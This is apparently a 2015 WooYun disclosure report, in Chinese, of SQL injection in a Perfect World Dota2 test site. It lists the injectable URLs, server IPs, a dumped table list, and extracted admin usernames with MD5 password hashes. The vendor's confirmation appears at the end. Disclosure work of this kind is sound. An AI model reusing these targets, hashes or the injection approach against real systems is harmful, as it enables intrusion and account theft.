当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137263

漏洞标题:完美世界DATA2某站SQL注入漏洞#二

相关厂商:完美世界

漏洞作者: M4sk

提交时间:2015-08-28 21:55

修复时间:2015-10-15 10:30

公开时间:2015-10-15 10:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-28: 细节已通知厂商并且等待厂商处理中
2015-08-31: 厂商已经确认,细节仅向厂商公开
2015-09-10: 细节向核心白帽子及相关领域专家公开
2015-09-20: 细节向普通白帽子公开
2015-09-30: 细节向实习白帽子公开
2015-10-15: 细节向公众公开

简要描述:

RT

详细说明:

准备收拾桌面睡觉....结果随手谷歌到一个url... 于是有了注入...
http://test.pwel.com.cn/EventsDota2/EventsDetailsArc4?cupId=
http://test.pwel.com.cn/MatchDota2/EventsDetailsArc2?userid=100013&userstr=1&cupId=1

test.pwel.com.cn  IP地址:122.228.79.123[浙江省温州市 电信]
games.pwel.com.cn IP地址:122.228.79.130[浙江省温州市 电信]


确定不是同一服务器 所以不影响之前提交的games.pwel.com.cn站的 所以审核大大别忽略咯
那么就看跑出来的数据~ 与之前的跑的数据也不一样哦~

1.png


Database: wmp_main
[101 tables]
+---------------------------------+
| tb_bid_dota2 |
| tb_bug_feedback |
| tb_bug_feedback_copy |
| tb_clients_info |
| tb_common_sequence |
| tb_cup_dota2 |
| tb_cup_match_log_dota2 |
| tb_cup_request_dota2 |
| tb_cup_round_dota2 |
| tb_cup_schedule_dota2 |
| tb_cup_schedule_ob_data2 |
| tb_cup_team_dota2 |
| tb_deploy_area |
| tb_deploy_host |
| tb_deploy_host_ip |
| tb_deploy_line |
| tb_deploy_service |
| tb_deploy_service_type |
| tb_dota2_daomoney_log |
| tb_dota2_hero_item |
| tb_dota2_trade_data |
| tb_dota2_trade_item |
| tb_dota2_trade_knapsack |
| tb_dota2_trade_log |
| tb_event_game_match_dota2 |
| tb_game_illegal_app_records |
| tb_game_map |
| tb_game_play_detail_dota |
| tb_game_play_detail_dota2 |
| tb_game_play_detail_dota2_pub |
| tb_game_play_detail_war3_1v1 |
| tb_game_play_detail_war3_2v2 |
| tb_game_play_dota |
| tb_game_play_dota2 |
| tb_game_play_dota2_pub |
| tb_game_play_war3_1v1 |
| tb_game_play_war3_2v2 |
| tb_game_room |
| tb_game_type |
| tb_global_dota2_code |
| tb_guild |
| tb_guild_member |
| tb_guild_score_change_dota |
| tb_guild_score_dota |
| tb_log_dota2_honor_record |
| tb_log_game_dota2 |
| tb_log_login |
| tb_log_match_stats |
| tb_log_match_stats_dota2 |
| tb_log_online |
| tb_log_record |
| tb_prop_activity_dota2 |
| tb_prop_item_dota2 |
| tb_resource_dota_equip |
| tb_resource_dota_hero |
| tb_resource_dota_item |
| tb_school |
| tb_school_member |
| tb_school_score_change_dota |
| tb_school_score_dota |
| tb_school_score_dota2 |
| tb_setting_city |
| tb_setting_country |
| tb_setting_dota2_bid_item |
| tb_setting_dota2_hero |
| tb_setting_dota2_honor_exchange |
| tb_setting_dota2_item |
| tb_setting_global |
| tb_setting_province |
| tb_setting_public_notice |
| tb_setting_shieldword |
| tb_system_notice |
| tb_team |
| tb_team_join_request |
| tb_team_member |
| tb_team_score_change_dota |
| tb_team_score_change_dota2 |
| tb_team_score_dota |
| tb_team_score_dota2 |
| tb_user_account |
| tb_user_chip_dota2 |
| tb_user_code_dota2 |
| tb_user_favorite |
| tb_user_friend |
| tb_user_friend_group |
| tb_user_friend_group_member |
| tb_user_hero |
| tb_user_hero_info_dota |
| tb_user_offline_message |
| tb_user_passport |
| tb_user_prop_dota2 |
| tb_user_school_honour_dota2 |
| tb_user_score_dota |
| tb_user_score_dota2 |
| tb_user_score_war3_1v1 |
| tb_user_score_war3_2v2 |
| tb_user_third_auth |
| tb_user_visit |
| tb_web_downloads |
| tb_web_records |
| tb_web_user_manage |
+---------------------------------+


[23:45:11] [INFO] retrieved: f_user_name
[23:45:11] [INFO] retrieved: varchar(100)
[23:45:12] [INFO] retrieved: f_user_password
[23:45:12] [INFO] retrieved: varchar(100)
[23:45:13] [INFO] retrieved: admin
[23:45:13] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:13] [INFO] retrieved: dota2
[23:45:13] [INFO] retrieved: d090b14a557aa3e53580950a2005e657
[23:45:13] [INFO] retrieved: fengyu@wywk.cn
[23:45:14] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:14] [INFO] retrieved: jancy
[23:45:14] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:14] [INFO] retrieved: netfish
[23:45:14] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:15] [INFO] retrieved: netfish_1
[23:45:15] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:15] [INFO] retrieved: netfish_mg1
[23:45:15] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:16] [INFO] retrieved: panqianliang
[23:45:16] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:16] [INFO] retrieved: pwel
[23:45:16] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:16] [INFO] retrieved: wywk-大西洋店
[23:45:17] [INFO] retrieved: 6531401f9a6807306651b87e44c05751


数据都在这 危害你懂得 不继续了 困死了 审核大大求个前台吧 么么哒!

漏洞证明:

综上

修复方案:

你会的

版权声明:转载请注明来源 M4sk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-31 10:28

厂商回复:

感谢洞主对完美世界的关注,我们将尽快修补。

最新状态:

暂无